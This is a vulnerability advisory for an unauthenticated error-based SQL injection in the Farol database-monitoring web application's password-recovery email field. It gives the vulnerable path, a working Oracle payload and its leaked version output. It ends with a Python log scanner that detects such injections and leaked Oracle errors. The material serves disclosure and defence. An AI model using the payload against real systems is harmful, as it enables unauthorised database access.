Farol SQL Injection

2015.09.20
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Overall CVSS score: 7.5/10
Impact: 6.4/10
Exploitability: 10/10
Access required: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Web Application Farol with unauthenticated SQL injection
# Date: 2015-09-16
# Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ]
# Vendor Homepage: http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol
# Version: [All]
# CVE : CVE-2015-6962
# OWASP Top10: A1-Injection

+---------------------+
+ Product Description +
+---------------------+

The FAROL web application is software that monitors databases.

+----------------------+
+ Exploitation Details +
+----------------------+

An unauthenticated SQL injection vulnerability has been detected in the login page of the FAROL web application. The e-mail field on the login page is vulnerable to error-based SQL injection.

Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar
Vulnerable POST Parameter: email

Usage: email'[SQLi error based]--

eg:
email=1'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--

Returned error:
ORA-20000: Oracle Text error: DRG-11701: thesaurus CORE 11.2.0.4.0 ProductionNLSRTL Version 11.2.0.4.0 - ProductionOracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit ProductionPL/SQL Release 11.2.0.4.0 - ProductionTNS for Linux: Version 11.2.0.4.0 - Production does not exist ORA-06512: at "CTXSYS.DRUE", line 160

+----------+
+ Solution +
+----------+

Upgrade the software.
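As an added example (not part of the advisory and not Farol's own code), the detection logic below flags the two conditions the advisory describes: a login `email` value that carries SQL metacharacters instead of an address, and raw Oracle error codes (ORA-/DRG-) being returned to the client, which is what makes error-based extraction possible. The tab-separated log format and all sample lines are constructed; the second sample line reuses the payload shape shown above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (not from the advisory): timestamp, method, path,
# raw URL-encoded POST "email" value, HTTP status, response excerpt.
SAMPLE_LOG = """\
2015-09-16T10:01:02Z\tPOST\t/tkmonitor/estrutura/login/Login.actions.php?recuperar\tjoao.silva%40example.com\t200\tE-mail enviado
2015-09-16T10:01:09Z\tPOST\t/tkmonitor/estrutura/login/Login.actions.php?recuperar\t1'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--\t500\tORA-20000: Oracle Text error: DRG-11701: thesaurus CORE 11.2.0.4.0 Production does not exist ORA-06512: at "CTXSYS.DRUE", line 160
2015-09-16T10:02:44Z\tPOST\t/tkmonitor/estrutura/login/Login.actions.php?recuperar\tmaria%40example.com.br\t200\tE-mail enviado
"""

# Shape of a plausible e-mail address; anything else in this field is suspect.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
# Quote, comment markers and SQL keywords never belong in an e-mail address.
SQLI_RE = re.compile(r"'|--|/\*|\b(or|and|select|union|from)\b", re.IGNORECASE)
# Oracle error codes leaking into the HTTP response (ORA-, DRG-, TNS-).
ORA_RE = re.compile(r"\b(ORA|DRG|TNS)-\d{5}\b")


def classify_email_param(raw_value):
    """Return the reasons a URL-encoded 'email' POST value looks like SQL injection."""
    value = unquote_plus(raw_value)
    reasons = []
    if not EMAIL_RE.match(value):
        reasons.append("not_an_email")
    if SQLI_RE.search(value):
        reasons.append("sql_metachars")
    return reasons


def oracle_error_codes(response_excerpt):
    """Return the distinct Oracle error codes found in a response excerpt, sorted."""
    return sorted({m.group(0) for m in ORA_RE.finditer(response_excerpt)})


def scan_log(text):
    """Return one finding per log line whose email value or response is suspicious."""
    findings = []
    for line in text.splitlines():
        ts, method, path, email, status, body = line.split("\t", 5)
        reasons = classify_email_param(email)
        leaked = oracle_error_codes(body)
        if reasons or leaked:
            findings.append({"ts": ts, "path": path, "status": int(status),
                             "reasons": reasons, "leaked_errors": leaked})
    return findings
```

The `leaked_errors` list is the more durable signal: a login page that never returns database error text to the client gives an error-based technique nothing to read, regardless of payload shape.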


Copyright 2024, cxsecurity.com